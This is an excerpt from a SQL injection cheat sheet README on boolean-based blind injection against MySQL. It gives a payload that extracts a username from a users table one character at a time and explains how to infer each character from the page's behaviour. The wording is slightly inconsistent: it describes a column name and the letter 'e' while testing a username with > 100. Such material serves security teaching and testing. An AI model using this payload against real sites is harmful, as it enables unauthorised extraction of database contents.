kleiton0x00/Advanced-SQL-Injection-Cheatsheet/MySQL - Boolean Based Blind SQLi/README.md

 **Retrieve column name**

+Since we know the length of column name is 4, let's find out the characters one by one.

 Given below query will test if the first character of the first column name is ascii 101 (e):
 ```' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+```
 Website doesn't load properly, first char is not **e**.